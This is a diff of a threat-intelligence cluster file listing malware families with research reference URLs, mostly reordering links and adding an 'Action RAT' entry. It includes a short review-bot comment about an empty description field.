 "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/",
- "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
- "https://attack.mitre.org/groups/G0001/",
+ "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html",
 "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html",
+ "https://attack.mitre.org/groups/G0001/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
 "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures",
- "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/",
- "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn"
+ "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf",
+ "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn",
+ "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/elderwood-project-12-en.pdf",
+ "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
+ "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/"
 ],
 "synonyms": [
 "HOMEUNIX",
@@ -11969,11 +12523,11 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos",
 "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
- "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/",
- "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak",
- "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software",
+ "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/",
 "https://www.carbonblack.com/2020/05/21/tau-technical-report-new-attack-combines-tinypos-with-living-off-the-land-techniques-for-scraping-credit-card-data/",
- "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/"
+ "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software",
+ "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak",
+ "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/"
 ],
 "synonyms": [
 "PinkKite",
@@ -12013,8 +12567,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader",
- "https://github.com/Tlgyt/AbSent-Loader",
- "https://twitter.com/cocaman/status/1260069549069733888"
+ "https://twitter.com/cocaman/status/1260069549069733888",
+ "https://github.com/Tlgyt/AbSent-Loader"
 ],
 "synonyms": [],
 "type": []
@@ -12041,9 +12595,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.acehash",
 "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
 "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf"
+ "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/"
 ],
 "synonyms": [],
 "type": []
@@ -12057,9 +12611,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox",
 "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
 "https://unit42.paloaltonetworks.com/acidbox-rare-malware/",
- "https://www.epicturla.com/blog/acidbox-clustering",
- "https://securelist.com/apt-trends-report-q2-2020/97937/"
+ "https://www.epicturla.com/blog/acidbox-clustering"
 ],
 "synonyms": [
 "MagicScroll"
@@ -12094,6 +12648,19 @@
 "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e",
 "value": "Acronym"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.action_rat",
+ "https://www.seqrite.com/blog/double-action-triple-infection-and-a-new-rat-sidecopys-persistent-targeting-of-indian-defence"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "57df4c54-3fff-49dd-9657-19265a66f5de",
+ "value": "Action RAT"
+ },
 {
 "description": "",
 "meta": {
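Review bot: The new Action RAT entry in the `@@ -12094,6 +12648,19 @@` hunk lands with `"description": ""`, so the cluster exposes a name, two refs and no text a reader or a search can use. The sibling Adamantium Thief entry right below shows the same empty string, which suggests the upstream source simply has no summary rather than a slip in this commit; if that is the case a one-sentence description drawn from the cited Seqrite post, added by hand or via a generator override, would make the entry stand on its own. Either way the empty-string policy should be deliberate — an empty `description` is indistinguishable from a missing one to most consumers but still counts as "present" to a schema check.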
@@ -12109,12 +12676,12 @@
 "value": "Adamantium Thief"
 },
 {
- "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.",
+ "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker",
- "https://twitter.com/JaromirHorejsi/status/813712587997249536",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016"
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016",
+ "https://twitter.com/JaromirHorejsi/status/813712587997249536"
 ],
 "synonyms": [],
 "type": []
@@ -12193,9 +12760,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.afrodita",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Afrodita.md",
+ "https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html",
 "https://twitter.com/_CPResearch_/status/1201957880909484033",
- "https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html"
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Afrodita.md"
 ],
 "synonyms": [],
 "type": []
@@ -12208,10 +12775,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.agendacrypt",
- "https://www.trendmicro.com/en_us/research/22/l/agenda-ransomware-uses-rust-to-target-more-vital-industries.html",
 "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
 "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/new-golang-ransomware-agenda-customizes-attacks/IOCs-blog-New%20Golang%20Ransomware%20Agenda%20Customizes%20Attacks.txt",
+ "https://www.trendmicro.com/en_us/research/22/l/agenda-ransomware-uses-rust-to-target-more-vital-industries.html",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
 "https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-agenda-customizes-attacks.html"
 ],
 "synonyms": [
@@ -12228,33 +12795,33 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz",
- "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/",
+ "https://unit42.paloaltonetworks.com/ironnetinjector/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://ryancor.medium.com/deobfuscating-powershell-malware-droppers-b6c34499e41d",
 "https://www.secureworks.com/research/threat-profiles/iron-hunter",
 "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
- "https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/",
- "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html",
- "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://artemonsecurity.com/snake_whitepaper.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a",
- "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
- "https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4",
- "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://docs.broadcom.com/doc/waterbug-attack-group",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
- "https://unit42.paloaltonetworks.com/ironnetinjector/",
- "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html",
- "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified",
- "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
- "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a",
- "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "https://cdn.muckrock.com/foia_files/2021/02/16/21R019_RESPONSE.pdf",
 "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a",
 "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://ryancor.medium.com/deobfuscating-powershell-malware-droppers-b6c34499e41d"
+ "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/",
+ "https://docs.broadcom.com/doc/waterbug-attack-group",
+ "https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/",
+ "https://artemonsecurity.com/snake_whitepaper.pdf",
+ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
+ "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf",
+ "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
+ "https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4",
+ "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified"
 ],
 "synonyms": [
 "ComRAT",
@@ -12267,139 +12834,140 @@
 "value": "Agent.BTZ"
 },
 {
- "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.",
+ "description": "A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla",
- "https://unit42.paloaltonetworks.com/excel-add-ins-malicious-xll-files-agent-tesla/",
 "https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware",
- "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/",
- "https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf",
- "https://forensicitguy.github.io/a-tale-of-two-dropper-scripts/",
- "http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/",
- "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
- "https://embee-research.ghost.io/agenttesla-full-analysis-api-hashing/",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://inquest.net/blog/2021/11/02/adults-only-malware-lures",
- "https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant",
- "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
- "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
- "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
- "https://twitter.com/MsftSecIntel/status/1392219299696152578",
- "https://blogs.blackberry.com/en/2021/06/threat-thursday-agent-tesla-infostealer-malware",
- "https://lab52.io/blog/a-twisted-malware-infection-chain/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?",
- "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/",
- "https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
- "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
- "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/",
- "https://team-cymru.com/blog/2022/07/12/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor",
- "https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/",
- "https://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html",
- "https://menshaway.blogspot.com/2021/04/agenttesla-malware.html",
- "https://blog.malwarebytes.com/cybercrime/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
- "https://blog.malwarelab.pl/posts/basfu_aggah/",
- "https://community.riskiq.com/article/40000d46",
- "https://www.netskope.com/blog/infected-powerpoint-files-using-cloud-services-to-deliver-multiple-malware",
- "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry",
- "https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/",
- "https://blog.talosintelligence.com/ipfs-abuse/",
- "https://blog.netlab.360.com/purecrypter",
- "https://community.riskiq.com/article/6337984e",
- "https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1",
- "https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked/",
- "https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/",
- "https://youtu.be/QQuRp7Qiuzg",
- "https://www.secureworks.com/research/threat-profiles/gold-galleon",
- "https://www.telsy.com/download/4832/",
- "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr",
- "https://community.riskiq.com/article/56e28880",
- "https://isc.sans.edu/diary/Infostealer+Malware+with+Double+Extension/29354",
- "https://guillaumeorlando.github.io/AgentTesla",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://www.secureworks.com/research/darktortilla-malware-analysis",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/",
- "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads",
- "https://asec.ahnlab.com/ko/29133/",
- "https://securelist.com/agent-tesla-malicious-spam-campaign/107478/",
- "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine",
- "https://malwarebookreports.com/agent-teslaggah/",
- "https://www.logpoint.com/en/blog/agentteslas-capabilities-review-detection-strategies/",
- "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/another-archive-format-smuggling-malware/",
- "https://www.inde.nz/blog/inside-agenttesla",
- "https://isc.sans.edu/diary/rss/28190",
- "https://youtu.be/hxaeWyK8gMI",
- "http://blog.nsfocus.net/sweed-611/",
- "https://blog.morphisec.com/agent-tesla-a-day-in-a-life-of-ir",
- "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns",
- "https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/",
- "https://www.youtube.com/watch?v=Q9_1xNbVQPY",
- "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/",
- "https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://isc.sans.edu/diary/rss/27092",
- "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting",
- "https://www.telsy.com/wp-content/uploads/ATR_82599-1.pdf",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware",
- "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/",
- "https://isc.sans.edu/diary/27088",
- "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
- "https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/",
- "http://www.secureworks.com/research/threat-profiles/gold-galleon",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4",
- "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/",
- "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
- "https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html",
- "https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/",
- "https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/",
- "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/",
- "https://unit42.paloaltonetworks.com/originlogger/",
- "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout",
- "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
- "https://mp.weixin.qq.com/s/X0kAIHOSldiFDthb4IsmbQ",
- "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
- "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
- "https://youtu.be/BM38OshcozE",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/02/02/catching-the-rat-called-agent-tesla",
- "https://forensicitguy.github.io/agenttesla-rtf-dotnet-tradecraft/",
- "https://guillaumeorlando.github.io/GorgonInfectionchain",
 "https://isc.sans.edu/diary/28202",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://malgamy.github.io/malware-analysis/Deep-Analysis-Agent-Tesla/",
- "https://isc.sans.edu/diary/27666",
- "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/",
- "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf",
- "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/",
- "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
- "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
- "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
- "https://malwatch.github.io/posts/agent-tesla-malware-analysis/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
 "https://blog.minerva-labs.com/preventing-agenttesla",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://youtu.be/BM38OshcozE",
+ 
"https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4", + "http://blog.nsfocus.net/sweed-611/", + "https://blog.talosintelligence.com/ipfs-abuse/", + "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/", + "https://isc.sans.edu/diary/27666", + "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", + "https://community.riskiq.com/article/56e28880", + "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", + "https://www.secureworks.com/research/threat-profiles/gold-galleon", + "https://isc.sans.edu/diary/27088", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/another-archive-format-smuggling-malware/", + "https://lab52.io/blog/a-twisted-malware-infection-chain/", + "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/", + "https://youtu.be/QQuRp7Qiuzg", + "https://www.telsy.com/download/4832/", + "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/", + "https://securelist.com/agent-tesla-malicious-spam-campaign/107478/", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/", + "https://blog.morphisec.com/agent-tesla-a-day-in-a-life-of-ir", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout", + "https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/", + 
"https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf", "https://cert.gov.ua/article/861292", - "https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/" + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", + "https://blog.qualys.com/vulnerabilities-threat-research/2022/02/02/catching-the-rat-called-agent-tesla", + "https://guillaumeorlando.github.io/AgentTesla", + "https://malwatch.github.io/posts/agent-tesla-malware-analysis/", + "https://inquest.net/blog/2021/11/02/adults-only-malware-lures", + "http://www.secureworks.com/research/threat-profiles/gold-galleon", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", + "https://unit42.paloaltonetworks.com/originlogger/", + "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", + "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", + "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/", + "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine", + "https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1", + "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", + "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", + "https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", + "https://menshaway.blogspot.com/2021/04/agenttesla-malware.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + 
"https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/", + "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/", + "https://www.youtube.com/watch?v=Q9_1xNbVQPY", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://guillaumeorlando.github.io/GorgonInfectionchain", + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", + "https://twitter.com/MsftSecIntel/status/1392219299696152578", + "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?", + "https://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html", + "https://forensicitguy.github.io/agenttesla-rtf-dotnet-tradecraft/", + "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", + "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", + "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", + "https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf", + "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", + "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", + "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/", + "https://embee-research.ghost.io/agenttesla-full-analysis-api-hashing/", + "https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla", + 
